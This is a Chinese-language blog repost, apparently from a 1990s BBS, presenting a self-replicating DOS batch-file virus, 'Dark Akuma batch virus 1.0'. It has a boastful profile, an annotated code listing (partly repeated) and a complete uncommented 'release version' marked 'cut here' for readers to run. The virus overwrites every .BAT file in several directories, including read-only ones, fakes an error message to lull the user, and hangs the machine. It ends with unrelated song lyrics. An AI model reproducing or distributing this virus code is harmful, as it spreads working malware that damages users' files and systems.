close
《 小檔案 》
病毒名稱:Dark Akuma batch virus 1.0
病毒長度:13XX byte
病毒說明:繼 PJ DEMO VIRUS 1.0 & PJ DEMO VIRUS 2.0 之後另一隻據感染力
的病毒,長度更小,感染力更強,若被修改成破壞性病毒,那將會變
得更可怖。
病毒發作:如果在執行中毒檔時,加上 .BAT 就會發作,原型病毒的發作是顯示
字串,然後盪機。
病毒特性:1. 對設唯讀的檔案亦具感染能力,這是一般批次檔病毒做不到的。
2. 當第一次執行時,會出現 Bad command or file name 來降低
user 的警戒心。
3. 它用呼叫模組感染,改毒者可以藉此輕易增加搜尋範圍。
4. 程式碼精簡,速度快,又有點小聰明,有時讓自己消失,
你還在莫名其妙時,它已經感染得「十面埋伏」了。
流行預測:希望啦! 最好不要流行..... 不然又要死一堆人了.... :)
偵毒:目前尚無程式可偵此毒,又就算可偵,改毒者一改又掃不到了....
《 病毒分析 》
@ECHO OFF
IF %1X==/COPYVIRX GOTO COPY
IF %1X==/COPYVIR2X GOTO COPY2
IF %1X==/RENVIRX GOTO REN
IF %1X==/SETVIRX GOTO SET
REM 這些是為了避免使用暫存檔.... 直接 CALL 本身 /參數....
IF NOT EXIST %0.BAT GOTO SICK
REM 如果 USER 加上 .BAT 就發作....
FOR %%A IN (%0.BAT) DO call %0 /SETVIR %%A
REM 把本身設在環境變數中,因為待會兒還要把所有批次檔 RENAME,怕把自己也 RENAME
REM 了,那會造成 BATCH FILE MISS...
REM 為什麼不使用 SET O=%0.BAT 呢? 因為如果 USER 的 CAPS LOCK 為小寫的話,
REM 還是會把自己 RENAME.... (EX. 字串"EE" ≠ 字串"ee")
SET F=
IF NOT EXIST %0.BBK SET F=N
REM 如果原檔不見了,待會兒要「自爆」.... :>
SET CD=.\
REM 搜尋檔案:目前目錄
CALL %0 /COPYVIR
REM 感染..... :>
SET CD=\
REM 搜尋檔案:根目錄
CALL %0 /COPYVIR
SET CD=C:\
REM 搜尋檔案: C: 根目錄
CALL %0 /COPYVIR
IF %F%X==NX ECHO @DEL %0.BAT > \N.BAT
IF %F%X==NX ECHO @IF EXIST %0.BBK DEL %0.BBK >> \N.BAT
IF %F%X==NX ECHO Bad command or file name
IF %F%X==NX ECHO \N.BAT >> %0.BAT
IF %F%X==NX GOTO END
REM 這是要「自爆」用的....
REM 找的到原檔的話繼續執行。
TYPE %0.BBK > \N.BAT
REM 用 TYPE >>,否則原檔要是唯讀屬性的話,會造成用完殺不掉。
@ECHO ON
@CALL \N.BAT %1 %2 %3 %4 %5 %6 %7 %8 %9
@ECHO OFF
REM 執行原檔,看的懂吧?
IF EXIST \N.BAT DEL \N.BAT
REM 殺掉暫存檔....
GOTO END
REM 結束...
:SET
REM 用以將本身 SET 入 環境變數....
SET O=%2
GOTO ENDP
REM 跳到 ENDP, 以免把 SET 洗掉....
:REN
REM 用以把指定的批次檔 RENAME,並用 ECHO\> 建一個暫時的無唯讀屬性的 .BAT..
IF %O%==%2 GOTO ENDP
IF %CD%%O%==%2 GOTO ENDP
REM 不能把自己 RENAME
REN %2 *.BBK
ECHO\>%2
GOTO ENDP
病毒名稱:Dark Akuma batch virus 1.0
病毒長度:13XX byte
病毒說明:繼 PJ DEMO VIRUS 1.0 & PJ DEMO VIRUS 2.0 之後另一隻據感染力
的病毒,長度更小,感染力更強,若被修改成破壞性病毒,那將會變
得更可怖。
病毒發作:如果在執行中毒檔時,加上 .BAT 就會發作,原型病毒的發作是顯示
字串,然後盪機。
病毒特性:1. 對設唯讀的檔案亦具感染能力,這是一般批次檔病毒做不到的。
2. 當第一次執行時,會出現 Bad command or file name 來降低
user 的警戒心。
3. 它用呼叫模組感染,改毒者可以藉此輕易增加搜尋範圍。
4. 程式碼精簡,速度快,又有點小聰明,有時讓自己消失,
你還在莫名其妙時,它已經感染得「十面埋伏」了。
流行預測:希望啦! 最好不要流行..... 不然又要死一堆人了.... :)
偵毒:目前尚無程式可偵此毒,又就算可偵,改毒者一改又掃不到了....
《 病毒分析 》
@ECHO OFF
IF %1X==/COPYVIRX GOTO COPY
IF %1X==/COPYVIR2X GOTO COPY2
IF %1X==/RENVIRX GOTO REN
IF %1X==/SETVIRX GOTO SET
REM 這些是為了避免使用暫存檔.... 直接 CALL 本身 /參數....
IF NOT EXIST %0.BAT GOTO SICK
REM 如果 USER 加上 .BAT 就發作....
FOR %%A IN (%0.BAT) DO call %0 /SETVIR %%A
REM 把本身設在環境變數中,因為待會兒還要把所有批次檔 RENAME,怕把自己也 RENAME
REM 了,那會造成 BATCH FILE MISS...
REM 為什麼不使用 SET O=%0.BAT 呢? 因為如果 USER 的 CAPS LOCK 為小寫的話,
REM 還是會把自己 RENAME.... (EX. 字串"EE" ≠ 字串"ee")
SET F=
IF NOT EXIST %0.BBK SET F=N
REM 如果原檔不見了,待會兒要「自爆」.... :>
SET CD=.\
REM 搜尋檔案:目前目錄
CALL %0 /COPYVIR
REM 感染..... :>
SET CD=\
REM 搜尋檔案:根目錄
CALL %0 /COPYVIR
SET CD=C:\
REM 搜尋檔案: C: 根目錄
CALL %0 /COPYVIR
IF %F%X==NX ECHO @DEL %0.BAT > \N.BAT
IF %F%X==NX ECHO @IF EXIST %0.BBK DEL %0.BBK >> \N.BAT
IF %F%X==NX ECHO Bad command or file name
IF %F%X==NX ECHO \N.BAT >> %0.BAT
IF %F%X==NX GOTO END
REM 這是要「自爆」用的....
REM 找的到原檔的話繼續執行。
TYPE %0.BBK > \N.BAT
REM 用 TYPE >>,否則原檔要是唯讀屬性的話,會造成用完殺不掉。
@ECHO ON
@CALL \N.BAT %1 %2 %3 %4 %5 %6 %7 %8 %9
@ECHO OFF
REM 執行原檔,看的懂吧?
IF EXIST \N.BAT DEL \N.BAT
REM 殺掉暫存檔....
GOTO END
REM 結束...
:SET
REM 用以將本身 SET 入 環境變數....
SET O=%2
GOTO ENDP
REM 跳到 ENDP, 以免把 SET 洗掉....
:REN
REM 用以把指定的批次檔 RENAME,並用 ECHO\> 建一個暫時的無唯讀屬性的 .BAT..
IF %O%==%2 GOTO ENDP
IF %CD%%O%==%2 GOTO ENDP
REM 不能把自己 RENAME
REN %2 *.BBK
ECHO\>%2
GOTO ENDP
REM 正式感染的主部份,一次針對一個目錄
IF EXIST %CD%*.BBK GOTO ENDP
REM 避免重複感染....
ECHO\ > \N.BAT
FOR %%D IN (%CD%*.BAT) DO ECHO CALL %0 /RENVIR %%D>>\N.BAT
CALL \N.BAT
REM 把所有 .BAT 改成 .BBK, 並建出相同檔名的空檔 .BAT
FOR %%B IN (%CD%*.BAT) DO CALL %0 /COPYVIR2 %%B
REM 把本身抄入所有的空 .BAT
GOTO ENDP
REM 把本身抄入(覆蓋)指定的檔案.... 但是原檔必須受到保護,不可更動。
IF %O%==%2 GOTO ENDP
IF %CD%%O%==%2 GOTO ENDP
COPY %0.BAT %2 > NUL
GOTO ENDP
:SICK
REM 發作:印字串,盪機....
ECHO This is a batch virus writtn by Dark Akuma at 1996,09
ECHO 本病毒由「暗黑豪鬼」寫作而成。於 1996,09
ECHO\
ECHO OH!!!! You semms no good..... HA!! HA!! HA!! HA!!
ECHO 嗯.... 你看起來氣色不好喔!!! 哈!! 哈!! 哈!! 哈!!
GOTO DOWN
SET O=
大家都看的懂嗎?
《 實驗版 》
以下是無註解版,叫做「實驗版」,讓大家自己玩的... 聽說也叫「放毒版」... :>
============================================================ >8 由此剪開... :)
@ECHO OFF
IF %1X==/COPYVIRX GOTO COPY
IF %1X==/COPYVIR2X GOTO COPY2
IF %1X==/RENVIRX GOTO REN
IF %1X==/SETVIRX GOTO SET
IF NOT EXIST %0.BAT GOTO SICK
FOR %%A IN (%0.BAT) DO call %0 /SETVIR %%A
SET F=
IF NOT EXIST %0.BBK SET F=N
SET CD=.\
CALL %0 /COPYVIR
SET CD=\
CALL %0 /COPYVIR
SET CD=C:\
CALL %0 /COPYVIR
IF %F%X==NX ECHO @DEL %0.BAT > \N.BAT
IF %F%X==NX ECHO @IF EXIST %0.BBK DEL %0.BBK >> \N.BAT
IF %F%X==NX ECHO Bad command or file name
IF %F%X==NX ECHO \N.BAT >> %0.BAT
IF %F%X==NX GOTO END
TYPE %0.BBK > \N.BAT
@ECHO ON
@CALL \N.BAT %1 %2 %3 %4 %5 %6 %7 %8 %9
@ECHO OFF
IF EXIST \N.BAT DEL \N.BAT
GOTO END
:SET
SET O=%2
GOTO ENDP
:REN
IF %O%==%2 GOTO ENDP
IF %CD%%O%==%2 GOTO ENDP
REN %2 *.BBK
ECHO\>%2
GOTO ENDP
:COPY
IF EXIST %CD%*.BBK GOTO ENDP
ECHO\ > \N.BAT
FOR %%D IN (%CD%*.BAT) DO ECHO CALL %0 /RENVIR %%D>>\N.BAT
CALL \N.BAT
FOR %%B IN (%CD%*.BAT) DO CALL %0 /COPYVIR2 %%B
GOTO ENDP
:COPY2
IF %O%==%2 GOTO ENDP
IF %CD%%O%==%2 GOTO ENDP
COPY %0.BAT %2 > NUL
GOTO ENDP
:SICK
ECHO This is a batch virus writtn by Dark Akuma at 1996,09
ECHO 本病毒由「暗黑豪鬼」寫作而成。於 1996,09
ECHO\
ECHO OH!!!! You semms no good..... HA!! HA!! HA!! HA!!
ECHO 嗯.... 你看起來氣色不好喔!!! 哈!! 哈!! 哈!! 哈!!
:DOWN
GOTO DOWN
:END
SET O=
:ENDP
============================================================ >8 由此剪開... :)
文章轉載自 椰林風情
常常責怪自己 當初不應該 誰知道又和妳相遇在人海 有多少愛可以重來? 有多少愛可以重來?☆心情點播☆--有多少愛可以重來(by 迪克牛仔)
作詞:何厚華 作曲:黃卓穎
===========================================================
常常後悔沒有把妳留下來
為甚麼明明相愛
到最後還是要分開
是否我們總是 徘徊在心門之外
命運如此安排 總教人無奈
這些年過得不好不壞
只是好像少了一個人存在
而我漸漸明白 妳仍然是我不變的關懷
有多少人願意等待?
當懂得珍惜以後回來
卻不知那份愛 會不會還在
有多少人值得等待?
當愛情已經桑田滄海
是否還有勇氣去愛?
全站熱搜
留言列表